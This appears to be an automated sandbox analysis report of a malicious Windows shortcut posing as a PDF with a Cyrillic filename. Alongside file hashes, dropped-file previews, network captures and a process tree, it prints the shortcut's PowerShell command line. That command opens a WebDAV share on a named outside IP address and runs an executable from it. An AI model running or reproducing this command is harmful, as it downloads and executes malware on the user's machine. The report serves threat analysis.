                                                                                                SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrz:KooCEYhgYEL0In
                                                                                                MD5:E45EA5A890466F134EB2FD1BE2D43A7E
                                                                                                SHA1:932B1BAD9C9EFD757DCC0380EA55B34914B3F448
                                                                                                SHA-256:1A046ED163FADCCA74C866488DD960374546496F7C558DEF57CCE9B8C60D1ECF
                                                                                                SHA-512:B24AF5B33A5FE9AE11416BB4F1B4E30A6D06CE32EA92DF320242690B4F377FD1FEEF64F84DAE08F6C4F49DB087D9C1C7D7AE966D95E9ED10052F9CD827F22565
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0e76ae96, page size 16384, Windows version 10.0
                                                                                                Category:dropped
                                                                                                Size (bytes):1310720
                                                                                                Entropy (8bit):0.4222199465703393
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:vSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:vazag03A2UrzJDO
                                                                                                MD5:2C7135A43F1C606651433CFF46558F2A
                                                                                                SHA1:20E42A88B7D180D32D37C2BAC5F981217C239347
                                                                                                SHA-256:D3E70A8593DA161A54149F8705B69692FEF5A24066CC2D91A73ADC7D560BB7AA
                                                                                                SHA-512:A5E9A12F77C8A6435CEB5BF787A22E3521E4FD8AC93B46FE8F76801841EC552CE340B2DE442F5119D20B4CAC21927F8A7B5B02B5F2270C4D881368852DD4E5CA
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:.v..... .......Y.......X\...;...{......................n.%......6...|...3...|..h.#......6...|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{.................................._..~.6...|..................,A...6...|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):16384
                                                                                                Entropy (8bit):0.07954526464869084
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:nAClWetYeW9s9jshWAw4IZ7llOE/tlnl+/rTc:xlz+s9jshGnhpMP
                                                                                                MD5:8E6373AF779F98869CE2A4B76E964039
                                                                                                SHA1:14FDE00550DF51DB8597D3ADE14479D08F4CAA63
                                                                                                SHA-256:5C34DE6716F6F3ECB0A321F54EB359E070B1322A65A647EB94D602714832157D
                                                                                                SHA-512:D6DFA939D9F7E142ABBE00F10B71DF29E024306748BAC0A5B46BC5AE278B879556E5303DD7DCE450B06DB31A77F4BFAE5FA3E54BC736964CC11755927B31EB5C
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:-........................................;...{...3...|...6...|...........6...|...6...|.....6...|..................,A...6...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\explorer.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):109536
                                                                                                Entropy (8bit):4.009392253694065
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:bfkRriQPsjKFh3iLGpnoPbFAVKwJCCNor:bfkRriQPsjah3iTbFA6/
                                                                                                MD5:4EC13BA68C6A26057AFB1C979E1F73B2
                                                                                                SHA1:788B827AB23E56A1EB3BABBFDF28EBB6B429C531
                                                                                                SHA-256:352D1EA4157A098A08D60B670FB57A22F556FA44B972ADB2979CCE9BE5304E95
                                                                                                SHA-512:96FB31967F7F6782CA0216F3CFFAA26C12E8E59B8435BC7267EE38AB13587F7475DA084B028FD584C19526C92C5BB4AAF1082F5D5D2AF6505241FF966BE0BB5C
                                                                                                Malicious:false
                                                                                                Preview:....h... ..............P...............Z......._...@..............x...W.......e.n.-.C.H.;.e.n.-.G.B...............`..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                                Process:C:\Windows\explorer.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):109536
                                                                                                Entropy (8bit):4.010090344591664
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:WfkzriQPsj+zh3iLGpnuFbFcVK+JCYNor:WfkzriQPsjsh3ijbFcEZ
                                                                                                MD5:D0B832D60E192A1CB624BDCF78189615
                                                                                                SHA1:1970156CFF0CBCC2EBA238166699D12BD3D91B2D
                                                                                                SHA-256:593BB7ADD84D8C74CE70EC4122C00628277EC3A1A6CD83C98FEE7CAA52EC1493
                                                                                                SHA-512:A0FA1B770C6C86036577360E1C898AD56651AC5FDFF018569CB34FADA7F406CCE12467F12902FDFA9ADC5D1AA2046303577976E3CBAFF4068D331ED045F82399
                                                                                                Malicious:false
                                                                                                Preview:....h... ..............P...............Z......._...@..............x...W.......e.n.-.C.H.;.e.n.-.G.B...............`..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                                Process:C:\Windows\explorer.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):858
                                                                                                Entropy (8bit):5.184327297552669
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Yzc25gHu9Ul9kC3c2TOFgHt0drc6hE10g:YzD5Mu9m9zDiWt0drcAESg
                                                                                                MD5:D1940DCB039A711EB608CDB9FF2437F0
                                                                                                SHA1:10D343452B322DF278E9779FA46ABDE4D27E9A56
                                                                                                SHA-256:8716EB5E9536E3B96CE491A819BEFCF9894682D319C0BD40FA1561D09F11ABC4
                                                                                                SHA-512:9D147D3916AA1AA3939A0D34A39DC001DA764EE0CAE31640098133FCCD10DA70F76CE9C1192C8131F999EA9CDE6AE5FF6B03E6533B747390A812BE4E7A1951C9
                                                                                                Malicious:false
                                                                                                Preview:{"serviceContext":{"serviceActivityId":"a5cf2e72-2cd9-417f-80ba-4b7a61cca92e","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"a5cf2e72-2cd9-417f-80ba-4b7a61cca92e|2024-11-21T09:51:08.3683083Z|fabric_msn|EUS2-A|News_445","tier":"\u0000","clientActivityId":"694BFF47-8BBD-4F36-B0ED-39020CC0ECFA"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true},"isPartial":false}
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):1.1628158735648508
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Nllluldhz/lL:NllU
                                                                                                MD5:03744CE5681CB7F5E53A02F19FA22067
                                                                                                SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                                                                SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                                                                SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                                                                Malicious:false
                                                                                                Preview:@...e.................................L..............@..........
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4694
                                                                                                Entropy (8bit):3.8496969563224326
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:uNT1MN3QcQtqt85I/i+5UbBKFnQlRtSogZoMe5UbBKFnQl4tSogZoo1:eq5bQxC/lubcFQQHwubcFQPHL
                                                                                                MD5:8A872822D3F0F48E054D544B38D8A4BC
                                                                                                SHA1:0A494387F6F39DB68737D385813E9B35C37AD8CE
                                                                                                SHA-256:421F49B635FFFDF37A80A3332110C2940BAE25BEE0FDD539E1056C24CB8A5E10
                                                                                                SHA-512:4D237964A2F0C6C585529D440982B16CAC34C0F585D18E63B25A9D6EAC48DBBABDA420D9D4D91B1A4E63D370E73A44226CA5DF1CC23589A0808500AE7F22167E
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F. .. .....|..........;...q3..;..y............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v.................;......2.y...uY]N .#U0414~1.LNK.........DWP`uY]N..........................P{4.#.U.0.4.1.4.#.U.0.4.3.e.#.U.0.4.3.a.#.U.0.4.4.3.#.U.0.4.3.c.#.U.0.4.3.5.#.U.0.4.3.d.#.U.0.4.4.2.#.U.0.4.3.8...p.d.f...l.n.k.......................-.....................R......C:\Users\user\Desktop\#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk.. .\.\.7.7...1.0.5...1.6.1...1.9.4.@.8.0.\.f.i.l.e.\.P.D.F...i.c.o.`.......X.......580913...........hT..CrF.f4... ..}T..b...,.......hT..CrF.f4... ..}T..b...,..............Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.............."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....D
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4694
                                                                                                Entropy (8bit):3.8496969563224326
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:uNT1MN3QcQtqt85I/i+5UbBKFnQlRtSogZoMe5UbBKFnQl4tSogZoo1:eq5bQxC/lubcFQQHwubcFQPHL
                                                                                                MD5:8A872822D3F0F48E054D544B38D8A4BC
                                                                                                SHA1:0A494387F6F39DB68737D385813E9B35C37AD8CE
                                                                                                SHA-256:421F49B635FFFDF37A80A3332110C2940BAE25BEE0FDD539E1056C24CB8A5E10
                                                                                                SHA-512:4D237964A2F0C6C585529D440982B16CAC34C0F585D18E63B25A9D6EAC48DBBABDA420D9D4D91B1A4E63D370E73A44226CA5DF1CC23589A0808500AE7F22167E
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F. .. .....|..........;...q3..;..y............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v.................;......2.y...uY]N .#U0414~1.LNK.........DWP`uY]N..........................P{4.#.U.0.4.1.4.#.U.0.4.3.e.#.U.0.4.3.a.#.U.0.4.4.3.#.U.0.4.3.c.#.U.0.4.3.5.#.U.0.4.3.d.#.U.0.4.4.2.#.U.0.4.3.8...p.d.f...l.n.k.......................-.....................R......C:\Users\user\Desktop\#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk.. .\.\.7.7...1.0.5...1.6.1...1.9.4.@.8.0.\.f.i.l.e.\.P.D.F...i.c.o.`.......X.......580913...........hT..CrF.f4... ..}T..b...,.......hT..CrF.f4... ..}T..b...,..............Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.............."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....D
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):55
                                                                                                Entropy (8bit):4.306461250274409
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                Malicious:false
                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 29 13:52:48 2024, mtime=Wed Oct 9 19:25:36 2024, atime=Thu Aug 29 13:52:48 2024, length=455680, window=hide
                                                                                                Entropy (8bit):4.5612203514260194
                                                                                                TrID:
                                                                                                • Windows Shortcut (20020/1) 100.00%
                                                                                                File name:#U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk
                                                                                                File size:1'401 bytes
                                                                                                MD5:cffb40e13e3aa6761330090b42314c36
                                                                                                SHA1:eb73790a82578588c0080175f8ac215025e57389
                                                                                                SHA256:330d36e248881a0a24a7d0612f3ac9a5a24cc960b36c2fe9ba0d63941b12fc18
                                                                                                SHA512:a5afb280e5cb16044e6ee77e3e4c696e45e065520e09d62fbc62d2b6e9938fa738a728bf7fe8815ca35a5fbe5b180574bda33ba380b8b5e6402f14aff7dd9913
                                                                                                SSDEEP:24:8voYk2CdGcRkKvgWQAoPWWsAM/6MUoIakWbG7A9Bf6WTFab/U3IVqm:8OtMcN1nohMLBIaTwA9rabU3Kq
                                                                                                TLSH:4E21FE201EF1037ACAF3C6B8A4F7633F9EBAB415E6114F4D115046065862321ECB9F2E
                                                                                                File Content Preview:L..................F.... ...O.;.#...p.Xf.....e=.#................................P.O. .:i.....+00.../C:\...................V.1.....HYK...Windows.@........OwHIYx.....6.......................I.W.i.n.d.o.w.s.....Z.1.....HY....System32..B........OwHIY........
                                                                                                Icon Hash:69e9a9a9a3a3a1a5

                                                                                                General

                                                                                                Relative Path:
                                                                                                Command Line Argument:-c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe
                                                                                                Icon location:\\77.105.161.194@80\file\PDF.ico
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 21, 2024 10:51:01.464806080 CET4973080192.168.2.477.105.161.194
                                                                                                Nov 21, 2024 10:51:01.584726095 CET804973077.105.161.194192.168.2.4
                                                                                                Nov 21, 2024 10:51:01.584841013 CET4973080192.168.2.477.105.161.194
                                                                                                Nov 21, 2024 10:51:01.585267067 CET4973080192.168.2.477.105.161.194
                                                                                                Nov 21, 2024 10:51:01.705009937 CET804973077.105.161.194192.168.2.4
                                                                                                Nov 21, 2024 10:51:03.327699900 CET4973080192.168.2.477.105.161.194
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 21, 2024 10:51:06.122558117 CET5727753192.168.2.41.1.1.1
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Nov 21, 2024 10:51:06.122558117 CET192.168.2.41.1.1.10xcafeStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Nov 21, 2024 10:51:06.349109888 CET1.1.1.1192.168.2.40xcafeNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.44973077.105.161.194805544C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 21, 2024 10:51:01.585267067 CET103OUTOPTIONS / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                User-Agent: DavClnt
                                                                                                translate: f
                                                                                                Host: 77.105.161.194


                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:04:50:58
                                                                                                Start date:21/11/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe
                                                                                                Imagebase:0x7ff788560000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:04:50:58
                                                                                                Start date:21/11/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:04:51:00
                                                                                                Start date:21/11/2024
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\explorer.exe" \\77.105.161.194@80\file\
                                                                                                Imagebase:0x7ff72b770000
                                                                                                File size:5'141'208 bytes
                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:04:51:02
                                                                                                Start date:21/11/2024
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:explorer.exe
                                                                                                Imagebase:0x7ff72b770000
                                                                                                File size:5'141'208 bytes
                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:4
                                                                                                Start time:04:51:03
                                                                                                Start date:21/11/2024
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                Imagebase:0x7ff6eef20000
                                                                                                File size:55'320 bytes
                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                No disassembly